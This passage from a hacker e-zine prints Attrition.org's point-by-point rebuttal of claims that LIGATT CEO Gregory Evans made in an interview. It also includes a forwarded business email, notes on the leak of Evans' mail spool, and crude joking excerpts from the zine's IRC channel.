him a fraud. There are simply too many details from the interview to enumerate here, so we have instead made the recordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested. After the interview, we contacted Attrition.org to get their take on everything told to us by Evans. We provided a list of key claims made by Evans, and this is their reply: All of this is the best of my memory, or with citation if I have it. : Evans lived in Germany in his youth and got in trouble for changing a : friend's grades. The father of this friend, who was a lawyer, hired : Evans (as a kid) to break into the computers of a competing law firm. I think this is partially new. The 'changing grades' claim has been made before, but not with additional details above. : In 1994, Evans operated the 4th or 5th largest ISP in the country named : Connect America financed by money made from hacking side-jobs. (I am : unsure if he meant in America or Germany) In the US, in California. Claims of the size are unverified, and I doubt they can be. The part about making money from hacking side-jobs is likely BS. During this time with Connect America, he was stealing phone lines and reselling them. This is basic toll fraud, and what lead him to getting busted and serving 2 years in prison. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf : Evans was friends with Kevin Mitnick in California, and they learned : about computers and phreaking together. This is a lie. Kevin Mitnick confirmed that while they were on the same floor of the LA detention center, they did not share a cell (as previously claimed by Evans), did not share any hacking / phreaking information, and did not learn from each other. Mitnick described Evans as someone who didn't seem to know much about hacking and asked basic questions. You can confirm this with a mail to Mitnick, and some of it covered here: http://attrition.org/errata/charlatan/gregory_evans/evans09.html http://twitter.com/kevinmitnick/statuses/16428972158 http://twitter.com/kevinmitnick/statuses/16429370781 : Evans has 100 employees and has hired people in Pakistan and India. This is hard to positively debunk, but I am relatively sure he does not have 100 employees currently. He has likely had 100 historically, but has a very high turnover rate. His claims of consultants in other countries make this basically impossible to verify, especially since he has not published financials for 2010 as required by the SEC. : The term "number 1 hacker" came from Mr. Morris, the FBI agent that : arrested Evans, who described Evans as on the "top 10 list of number 1 : hackers." This is a new claim (re: Morris), but based on my experience with the FBI seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At that time, the FBI had seen some pretty high end / impressive hacking, and what Evans was doing didn't come close. : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and : a $4 million house. None of this can be verified so far, and we've tried. Given the apartments he has lived in for the last 2 years, as verified by ex employees, it is unlikely he has had any significant money to do this. Based on court records we have published, he likely has never actually had 1 million dollars, just serious debt, including the ~ 10 million he still owes. Even now, he owes serious money not only for the previous crimes, but as a result of his business dealings the last few years. We have some of the records: http://attrition.org/errata/charlatan/gregory_evans/ligatt15/ A summary of his debt: http://attrition.org/errata/charlatan/gregory_evans/evans21.html : Evans's book "Laptop Security" sold 150,000 copies. We have not heard this claim. However, search Amazon for that title and look how many are available new/used, and it is likely false. It's curious he is focusing on that book, as all of his previous claims centered around the 'No 1 Hacker' book. : The material found online in Evans's "No. 1 Hacker" book was not : copyrighted and therefore was not legally forbidden to use. This is patently false. The material he found online *was* copyrighted, even if the work did not explicitly say it was. This is copyright 101. There is currently a group of the authors that are still considering taking action against him. I have personally read mails from half a dozen of these authors that confirm they hold the copyright, and that they did NOT give him permsission or sell it to him (as he claimed in other sources). A mail to Simple Nomad of NMRC will confirm this as one of the authors (who will reply and confirm, while others will not due to potential legal action). : Evans was contracted to set up a CCTV camera network at a county prison : while on probation. Never heard this claim, but given how prisons work (and two direct family members that worked in that system), this is very dubious. : Evans has committed "every type of high-tech crime you can ever think of : before [he] was 26-years-old." Again, his conviction was for basic toll fraud. This doesn't suggest any level of skill that would back this claim. : In 1998, Evans was interrogated by the authorities regarding a : system-wide crash of the SkyTel pager network. No way to verify this short of a FOIA request for that case. I have not heard this claim before. : Every time Evans was caught by the authorities, it was because someone : else snitched on him. The current court records do not suggest this. They do suggest that Evans was a snitch (see Mitnick's presentation last year about the topic). We have the docket for his big case online, and there is no mention of a snitch. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf http://attrition.org/errata/charlatan/gregory_evans/ligatt07/ : "High-tech grand theft" is a new state crime that was formed : specifically because of Evans's actions. There is no state law that uses those words I bet =) Did he mean Georgia? How 'new'? This would be easy to verify unless he further spins the claim. : There are plenty more points, but there's just too much stuff to listen : to. It's not too bad of a list, anyways. As usual, and it isn't just Evans, these types of claims are almost always made without any real detail, no verification from HIM, etc. Unfortunately, a lot of these are new claims or have new elements we haven't seen. : I have also attached an email that Evans forwarded to me that may be of : interest to you. Thank you again for your time, and I look forward to : your response to these claims. Yep, np! If you want to run any other claims by me, feel free. I will be offline for about 24 hours starting Thursday as I fly back to the states. As for the e-mail, I have read it before actually via Don. It was not published on attrition.org because it is irrelevant to Evans' claims. Because he offered to buy a web site, doesn't mean any deal was made regarding publishing material written by Don. It does not speak to any agreement, purchase or transfer of copyright of text included in Evans book. So yes, it wasn't included on our site =) As always, showing one thing that is marginally related to a piece of another story isn't proof, but it is an essential tool in a con. - jericho The attached email mentioned above can be read here. Evans forwarded this to us after the interview: Sorry we got disconnected. Here is proof that I sent Donald an email asking to buy his website 6 months before hand. Proving that there was no malicious intent. This is the stuff that they did not put on Attrition.org. Also if you want to finish up just let me no. Begin forwarded message: > From: "EH-Net-Don" > Date: December 17, 2009 12:15:13 PM EST > To: "'Gregory Evans'" > Subject: [SPAM] RE: Purchase of Ethical Hacker Network > Reply-To: > > Hey Gregory, > > Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and > tears get recognized in a positive way. Although I’m not sure selling is my desire at the > moment, I’m always willing to talk business and make new friends in the industry. Either way, > you might be interested in getting the word out about your company and its products and > services to a wider ethical hacking community. Maybe we could also chat about advertising on > my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse > pitch? ;-) > > If you don’t mind me asking, how did you find out about us? > > Looking forward, > Don > > PS – There’s a typo in you LA address. Guess I can’t stop being an editor. J > Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME > The Digital Construction Company > 1520 Heidorn Ave. > Westchester, IL 60154 > 708.837.3002 (Cell) > Founder & Organizer > ChicagoCon > Editor-In-Chief > The Ethical Hacker Network > > > > From: Gregory Evans [mailto:gregoryevans@ligatt.com] > Sent: Wednesday, December 16, 2009 11:38 PM > To: don@ethicalhacker.net > Subject: Purchase of Ethical Hacker Network > > Hello Donzal, > > My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very > impressed with your website Ethical Hacker Network. I would love to speak to you sometime > about purchasing the website and still having you run the site. If you are interested please > feel to contact me at 866-354-4288 Ext. 5673. > > Have a Blessed Day, > > Gregory Evans > President / CEO > > 866-354-4288 Ext. 5673 > > Atlanta: > 6050 Peachtree Parkway > Suite 200 > Norcross, Ga 30092 > > Los Angeles: > 11209 Naitonal Blvd. > Suite 178 > Los Angeles, Ca 90292 > Have a Blessed Day, Gregory Evans President / CEO Ring: 866-354-4288 Ext. 5673 Look: www.LIGATT.COM Follow: www.twitter.com/ligatt Post: www.facebook.com/GregoryDEvans Atlanta 6050 Peachtree Parkway Suite 200 Norcross, Ga 30092 As if there wasn't enough drama already, on February 2, a message was broadcasted to the Full- Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leaking hordes of personal and confidential information. We, personally, have taken little time to look through the leak and aren't able to better confirm or deny any claims made by Evans. There is most likely much to learn, though, according to Jericho: : Thank you very much for providing insight on these claims. Would it be : okay to publish this email in the zine? I think it would be interesting : to place this side-by-side with the interview. Yep, feel free. Also note, that with recent events (Evans' entire mail spool being leaked / published), some of these claims may be more thoroughly debunked in the coming weeks. As an example, his mail spool shows that he did register thecyberwars.com despite repeated claims he had nothing to do with it. : > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and : > : a $4 million house. : > : > None of this can be verified so far, and we've tried. Given the apartments : > he has lived in for the last 2 years, as verified by ex employees, it is A recent mail leaked from his spool shows that he could not even rent an apartment under his mom's name after they performed due diligence. When confronted with it, Evans libels attrition: http://pastebin.com/J4JeG2W8 : > A summary of his debt: : > : > http://attrition.org/errata/charlatan/gregory_evans/evans21.html Updated with another entry since this mail. Also, : Additionally, I found these the other day; you may also find them wildly : amusing: : : http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/ Already posted on the charlatan page. : http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show He claims his life story was bought for a movie, that never materialized. As I tweeted the other day: Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal went nowhere? http://in.sys-con.com/node/927014 If he did get a reality show, why doesn't he name the network / company that bought it? And, : ?I have to be modest and say that we at LIGATT could not have been able : to do this without the help of Chris John Riley, Kris French, Sam Bowne, : Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other : people who kept our name relevant. What sealed the deal for us and got : the networks to say, ?lets do it? was ?LIGATTleaks?. Again, I have shown : that what people may say about you or try to do to you does not stand in : the way of my success. Success it the best revenge,? says Evans. : : Thought that was funny. Yep, that is his new strategy for the last few weeks, he said the same thing in one of his recent video blogs as well. -=-=- If you would like to weigh in on the interview, the LIGATT controversy, or anything related to LIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we will publish intelligent arguments and opinions (both for and against) in the next issue. [==================================================================================================] -=[ 0x0e Et Cetera, Etc. -=[ Author: teh crew In the absence of any real miscellaneous content, why not take a look at some of the shenanigans that go on in the good 'ol #gny. We're competent! We promise! ---------------------------------------------------------------------------------------------------- [16:22] It is expected on February 3rd, 2011, that there will be a formal announcement in the US that IPv4 addresses have been completely exhausted [16:23] yes [16:23] but they finished today [16:23] who got the last one? [16:23] fucked if i know [16:23] was it 999.999.999.999 [16:23] but I would sell it [16:23] oliverjhudson93, I hope you are trolling [16:23] cause otherwise [16:23] that was the most retarded thing [16:23] I have ever heard [16:23] nah i'm pulling your leg :P [16:23] good [16:23] (im joking) [16:24] cough liar [16:24] you are joking about lying? [16:24] i'm joking about joking? [16:24] I don't know anymore [16:24] I'm gonna DDoS 127.0.0.1 D: [16:25] oliverjhudson93, what is the highest IP someone could have? [16:25] not even taking into account the limits set in place for broadcasts blah blah blah [16:25] straight up, highest IP address [16:25] 255 [16:26] I don't actually know [16:26] but i figure [16:26] 255.255.255.255? [16:26] but thats like [16:26] subnet mask or some shit that I don't understand [16:26] technically it's 256.256.256.256 [16:26] but as we have limits imposed [16:26] yes [16:26] 255.255.255.255 [16:26] See I dun goof'd! [16:27] urr no [16:27] it is 0-255 [16:27] yea I fubar'd [16:27] because that is the range of values you can store in an 8bit number [16:27] you don't know [16:27] how hard [16:27] I headdesked [16:27] after I typed that [16:27] :P [16:27] I am embarrassed for you [16:27] and was hoping no one would catch it A shitty situation ---------------------------------------------------------------------------------------------------- [21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch? [22:05] <~Silks> what if I were to? [22:06] <&storm> i would be curious to see that since i don't have a porch [22:06] <~Silks> what do you have that I could shit on? [22:07] <&storm> the dorm building has a stoop, i guess [22:07] <&storm> well, not really actually [22:08] <~Silks> what about siblings? [22:08] <~Silks> do you have a sister? [22:08] <&storm> i'm an only child [22:08] <&storm> :( [22:08] <~Silks> ditto [22:08] <~Silks> however that means you have a lot of stuff [22:08] <~Silks> and therefore a lot of things to be fouled [22:09] <&storm> this is very true [22:10] <&elchupathingy> what if [22:10] <&elchupathingy> we built a porch [22:10] <&elchupathingy> then shit on it [22:10] <&storm> i like your thinking GTFO emo storm ---------------------------------------------------------------------------------------------------- [01:12] sometimes i message myself to check if i'm still connected [01:13] that sounds depressing as hell We could go on, but that would only embarrass us more. And everyone knows the first rule to being a sooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS. Yeah, whatever. So, yeah. Looks like the end of issue #4 - hope you liked it. Like always, if you'd like to submit content for future issues, our contact information is in the introduction. The call for papers for issue #5 is now open, so get your crap in. See you in the summer. <3, the gny crew irc.gonullyourself.org +6697 #gny [==================================================================================================]